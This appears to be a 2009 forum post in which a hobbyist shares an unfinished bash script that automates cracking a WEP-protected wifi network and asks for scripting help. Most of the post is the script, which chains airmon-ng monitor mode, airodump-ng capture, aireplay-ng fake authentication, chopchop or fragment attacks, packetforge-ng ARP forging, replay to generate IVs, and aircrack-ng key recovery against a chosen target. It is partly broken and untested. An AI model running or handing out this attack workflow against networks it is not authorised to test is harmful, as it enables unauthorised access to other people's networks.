I have a hobby that's breaking wifi networks (with permission, of course!), so I made this script to get a little practice in scripting.
So far I have dumped all the necessary commands for the WEP cracking process. Needs a little cleaning up!
It also assumes you're in the directory you want to dump all the files. Maybe could add a 'rm' as a clean-up?
This is only my third script so some stuff I have not got around to learning.
I would like some help in finding a way to run some of the commands in new terminals or shells. This has to be done.
Also, I need to make the 'for' loop (highlighted by "###") run each of the variable assignment commands for each of the searched networks found. I'll get there, but maybe someone has a good way?
Any other help would be appreciated!
I apologize for the mess!
--- EDIT --- 22.08.09--------------------
updated the script into something a little more workable. Still in progress as I haven't tested it fully yet, only segments.
The netlist_auto method is VERY inefficient and needs more work.
[size=85][/size]
Still need advice for running processes in external shells (ideally in a split Terminator terminal!
)
--------------------
Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES
# --------------------
#
wifi_device= # prompted at start of script
source_address= # auto collected after obtaining $wifi_device
source_device= # prompted after enabling monitor mode
target_address= # prompted after choosing target network
target_channel= # prompted after choosing target network
target_essid= # prompted after choosing target network
networks_count= # auto collected when running a network scan
i=1 # counter in displaying broadcasting networks
choice= # prompted at CHOPCHOP|FRAGMENT
capture_files= # prompted when capturing packets
packetforge_packet= # prompted when building the packet to replay
cleanup_answer= # prompted at clean_up Y|N
net_choice= # prompted at network choice
# --------------------
# FUNCTIONS
# --------------------
function clean_up() {
echo "Script terminated. Cleaning created files"
# removed all files created
exit 0
}
function netlist_manual() {
# print iwlist in LESS, then enter the target
echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
echo -n "(Enter to continue...)"
read
# print the network list in LESS reader
iwlist $wifi_device scanning | less
echo -n "Enter the ADDRESS > "
read target_address
echo -n "Enter the ESSID > "
read target_essid
echo -n "Enter the CHANNEL > "
read target_channel
}
function netlist_auto() {
##################################################
# The following commands extract the variables needed from the iwlist command
# Still need to
# 1) and from there choose the desired WEP network
# the following should then gather the data needed
##################################################
networks_count=`iwlist wlan0 scanning | grep -E -o -c "Cell [0-9]+[0-9]"`
clear
echo "$networks_count networks found"
echo ""
for each in $(seq $networks_count)
do
# Need to reduce the number of iwlist calls (6x per network found) - maybe store in a text file
target_address=$(iwlist $wifi_device scan | grep -E "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | awk '/Address/ {print $5}')
target_channel=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2)
target_essid=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2)
target_encrypt=$(iwlist $wifi_device scan | grep -E -A 6 "`iwlist wlan0 scan | grep -E -o "Cell [0-9]+[0-9]" | sed -n "${i}p"`" | sed -n '7p' | cut -d ":" -f2)
#cat ~/iwlist_script_networks | grep -E "`cat ~/test | sed -n "${i}p"`" | awk '/Address/ {print $5}'
#cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '4p' | cut -d ":" -f2
#cat ~/iwlist_script_networks | grep -E -A 10 "`cat ~/test | sed -n "${i}p"`" | sed -n '2p' | cut -d ":" -f2
echo "Network #$i"
echo "--------------------"
echo "Address: $target_address" # need to fix the assignment of variables here
echo "ESSID: $target_essid" #
echo "Channel: $target_channel" #
echo ""
i=`expr $i + 1`
done
###############################################
}
# --------------------
# MAIN
# --------------------
#
trap clean_up SIGHUP SIGTERM SIGINT
#mkdir ~/temp_caps/
# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
echo -n "Enter your WIFI device > "
read wifi_device
# obtain my MAC address
source_address=`ifconfig $wifi_device | awk /'HWaddr/ {print $5}'`
echo "MAC Address being used: $source_address"
sleep 2
while [ "$net_choice" = "" ]; do
echo "Choose method for displaying networks:"
echo " 1) manual input method"
echo " 2) auto-choice method (broken)"
echo ""
echo -n "Enter you choice > "
read net_choice
case $net_choice in
1 ) #
netlist_manual
;;
2 ) #
netlist_auto
;;
* ) echo "Not a valid choice!"
sleep 2
net_choice=
clear
;;
esac
done
# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start $wifi_device $target_channel
echo -n "Enter the new monitor-enabled interface > "; read source_device
# capture the packets and IV's using AIRODUMP-NG
# -------------------- need to do this in another window
echo "Starting airodump-ng to capture the packets needed..."
echo -n "Specify the name of the capture file > "; read capture_files
sudo airodump-ng -c $target_channel --bssid $target_address --write $capture_files $source_device
# use AIREPLAY-NG for FAKE AUTHENTICATION
# will continue to send keep-alive requests, incase the target refreshes (DHCP)
# -------------------- need to do this in another window
echo "Fake authenticating with target using aireplay-ng..."
sudo aireplay-ng --fakeauth 1 -q 5 -e $target_essid -a $target_address -h $source_address $source_device ## -q -- keep alive requests
################################
# choose between the CHOP-CHOP or FRAGMENT method for building packets
# -------------------- need to be in another window
while [ "$choice" = "" ]; do
echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
echo -n "Enter you choice > "
read choice
case $choice in
chopchop ) # brute force an ARP packet from CHOP-CHOP
echo "please follow the instructions..."
sudo aireplay-ng --chopchop -e $target_essid -a $target_address -h $source_address $source_device
;;
fragment ) # send FRAGMENTED packet to target, returning nesissary data
echo "please follow the instructions..."
sudo aireplay-ng --fragment -e $target_essid -a $target_address -h $source_address $source_device
;;
* ) echo "Not a valid choice"
echo ""
choice=
;;
esac
done
################################
echo "Using packetforge-ng to create the new packet..."
echo -n "Enter the filename for the newly built packet > "
read packetforge_packet
sudo packetforge-ng -0 -y *.xor -a $target_address -h $source_address -k 255.255.255.255 -l 255.255.255.255 -w ${packetforge_packet}.cap
# using AIREPLAY-NG to generate IV's
echo "Using aireplay-ng to bombard target and generate IV's..."
sudo aireplay-ng --arpreplay-ng -e $target_essid -a $target_address -h $source_address -r ${packetforge_packet}.cap $source_device
# using AIRCRACK-NG to release the passkey
echo "Going to crack the passkey with aircrack-ng..."
sudo aircrack-ng -l $target_essid ~/${capture_files}.*
clear
echo "Key-file is in your home directory, filled under (router ESSID).(router MAC).*"
clear
while [ "$cleanup_answer" = "" ]; do
echo -n "Would you like to remove all other files, packets and captures [y/n]? > "
read cleanup_answer
case $cleanup_answer in
y) #
echo "Cleaning up..."
clean_up
;;
n) #
echo "leaving files alone... N chosen"
;;
*) #
echo "Not a valid choice.."
sleep 2
clear
cleanup_answer=
;;
esac
done
- this is only my second script!
